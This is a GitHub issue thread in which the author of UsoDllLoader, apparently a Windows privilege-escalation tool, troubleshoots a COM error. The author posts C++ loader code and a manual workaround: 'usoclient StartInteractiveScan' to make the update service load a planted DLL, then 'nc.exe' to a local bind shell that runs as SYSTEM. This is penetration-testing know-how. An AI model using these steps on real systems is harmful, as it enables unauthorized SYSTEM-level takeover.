### ISSUE TITLE
Wrong Parameter error

### ISSUE THREAD

**Issue by S3cur3Th1sSh1t** [itm4n/UsoDllLoader#2]
Hi,

at first -> good work for this! 👍 

I just tried getting a system shell using your binary, but i always get the following error by executing the loader.exe:
```
[*] Using UpdateOrchestrator->StartScan()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.
    |__ Creating a new Update Session... Done.

    |__ Something went wrong (80070057 - "Wrong Parameter.").
```
I checked that not one of the following conditions is met:

- One or several updates are waiting to be installed.

- Updates are being installed.

By manually searching for updates GUI like the DLL is called correctly and the listening Port is open.

Some idea for the cause here?

**Comment by itm4n** [comment]
Hey! Thanks. :)

That's a COM related issue, it's not related to the environement or context. 0x80070057 is a standard COM error code which means "Invalid parameters".

I have no idea why you get this error. I've just tested the release version on two different versions of Windows 10 and it's working fine. 

Could you send me the following details?
- System arch (32/64 bits)
- Full Windows version (`reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildLabEx`)

Alternatively, you should be able to load the DLL "manually" using one of these commands:
- `usoclient StartScan`  
- `usoclient StartInteractiveScan`  

As a workaround, you could also try to comment out the `UpdateOrchestrator->StartScan()` part in `UsoDllLoader.cpp` and go directly to the `UpdateOrchestrator->StartInteractiveScan()`. This one always worked for me. 

```cpp
// https://github.com/itm4n/UsoDllLoader/blob/master/UsoDllLoader/UsoDllLoader.cpp
/*
// Try to trigger DLL loading with 'StartScan'
wprintf_s(L"[*] Using UpdateOrchestrator->StartScan()\n");
MiniUsoClient miniUsoClient;
if (!miniUsoClient.Run(USO_STARTSCAN))
	return 1;

// Wait a bit before trying to connect to the bind shell.
// We might need this if the machine is slow. 
//wprintf_s(L"[*] Waiting for the DLL to be loaded...\n");
Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");

if (iRes != 0)
{
	wprintf_s(L"[*] Retrying with UpdateOrchestrator->StartInteractiveScan()\n");
	if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN))
		return 2;

	Sleep(TEMPO);

	iRes = tcpClient.connectTCP("127.0.0.1", "1337");
}
*/

// Replace the above part with:
MiniUsoClient miniUsoClient;
wprintf_s(L"[*] Using UpdateOrchestrator->StartInteractiveScan()\n");
if (!miniUsoClient.Run(USO_STARTINTERACTIVESCAN))
	return 2;

Sleep(TEMPO);

iRes = tcpClient.connectTCP("127.0.0.1", "1337");
```

**Comment by S3cur3Th1sSh1t** [comment]
Hi,

The System arch is x64, all updates installed.
The Registry entry contains the following:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
    BuildLabEx    REG_SZ    17134.1.amd64fre.rs4_release.180410-1804
```
Manual triggers:
usoclient StartScan -> No trigger for me
usoclient StartInteractiveScan -> works fine for me to trigger the dll load.

By commenting out StartScan and using StartInteractiveScan i get the same error: 
```
[*] Using UpdateOrchestrator->StartInteractiveScan()
    |__ Creating instance of 'UpdateSessionOrchestrator'... Done.
    |__ Creating a new Update Session... Done.

    |__ Something went wrong (80070057 - "Falscher Parameter.").
```

StartDownload also throws the same error message here.

**Comment by itm4n** [comment]
Well, my guess is that the COM interface is slightly different in this version of Windows 10. 

As a workaround you could:
1) Use the command `usoclient StartInteractiveScan` to force the USO service to load the DLL.
2) Use `nc.exe 127.0.0.1 1337` to connect to the bind shell.

That's exactly what my loader does actually.

I initially developped the `UsoDllLoader` tool to replace `usoclient` but, in the end, what matters is the DLL. As long as it is loaded by the USO service, you can put any code you want in it and it will be executed as SYSTEM.

I know it's just a workaround, it's not a proper solution but it works. :P
